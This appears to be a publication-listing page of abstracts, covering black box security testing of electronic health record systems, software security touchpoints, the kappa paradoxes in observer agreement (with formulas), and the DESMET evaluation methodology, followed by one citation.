Security experts use their knowledge to attempt attacks on an application in an exploratory and opportunistic way in a process known as penetration testing. However, building security into a product is the responsibility of the whole team, not just the security experts who are often only involved in the final phases of testing. Through the development of a black box security test plan, software testers who are not necessarily security experts can work proactively with the developers early in the software development lifecycle. The team can then establish how security will be evaluated such that the product can be designed and implemented with security in mind. The goal of this research is to improve the security of applications by introducing a methodology that uses the software system's requirements specification statements to systematically generate a set of black box security tests. We used our methodology on a public requirements specification to create 137 tests and executed these tests on five electronic health record systems. The tests revealed 253 successful attacks on these five systems, which are used to manage the clinical records for approximately 59 million patients, collectively. If non-expert testers can surface the more common vulnerabilities present in an application, security experts can attempt more devious, novel attacks.
Conference Paper
Software security has come a long way in the last few years, but we've really only just begun. I will present a detailed approach to getting past theory and putting software security into practice. The three pillars of software security are applied risk management, software security best practices (which I call touchpoints), and knowledge. By describing a manageably small set of touchpoints based around the software artifacts that you already produce, I avoid religious warfare over process and get on with the business of software security. That means you can adopt the touchpoints without radically changing the way you work. The touchpoints I will describe include: code review using static analysis tools; architectural risk analysis; penetration testing; security testing; abuse case development; and security requirements. Like the yin and the yang, software security requires a careful balance: attack and defense, exploiting and designing, breaking and building, bound into a coherent package. Create your own Security Development Lifecycle by enhancing your existing software development lifecycle with the touchpoints.
Article
An omnibus index offers a single summary expression for a fourfold table of binary concordance among two observers. Among the other available omnibus indexes, none offers a satisfactory solution for the paradoxes that occur with p0 and kappa. The problem can be avoided only by using ppos and pneg as two separate indexes of proportionate agreement in the observers' positive and negative decisions. These two indexes, which are analogous to sensitivity and specificity for concordance in a diagnostic marker test, create the paradoxes formed when the chance correction in kappa is calculated as a product of the increment in the two indexes and the increment in marginal totals. If only a single omnibus index is used to compare different performances in observer variability, the paradoxes of kappa are desirable since they appropriately "penalize" inequalities in ppos and pneg. For better understanding of results and for planning improvements in the observers' performance, however, the omnibus value of kappa should always be accompanied by separate individual values of ppos and pneg.
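In the standard notation for a fourfold table (a = both observers positive, d = both observers negative, b and c = the two kinds of disagreement, n = a + b + c + d), the indexes discussed here are:

```latex
\[
  p_0 = \frac{a+d}{n}, \qquad
  p_{\mathrm{pos}} = \frac{2a}{2a+b+c}, \qquad
  p_{\mathrm{neg}} = \frac{2d}{2d+b+c}, \qquad
  \kappa = \frac{p_0 - p_e}{1 - p_e}
\]
% where p_e = [(a+b)(a+c) + (c+d)(b+d)] / n^2 is the chance-expected agreement.
% The kappa paradoxes arise when a skewed prevalence inflates p_e, so that
% kappa is low even though the raw agreement p_0 is high.
```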
Article
DESMET was a DTI-backed project with the goal of developing and validating a methodology for evaluating software engineering methods and tools. The project identified nine methods of evaluation and a set of criteria to help evaluators select an appropriate method. Detailed guidelines were developed for three important evaluation methods: formal experiments, quantitative case studies and feature analysis evaluations. This article describes the way the DESMET project used the DESMET methodology both to evaluate the methodology itself and to provide direct assistance to the commercial organisations using it.
Ackerman E (2019) Upgrade to superhuman reflexes without feeling like a robot. IEEE Spectrum. URL: https://spectrum.ieee.org/enablingsuperhuman-reflexes-without-feeling-like-a-robot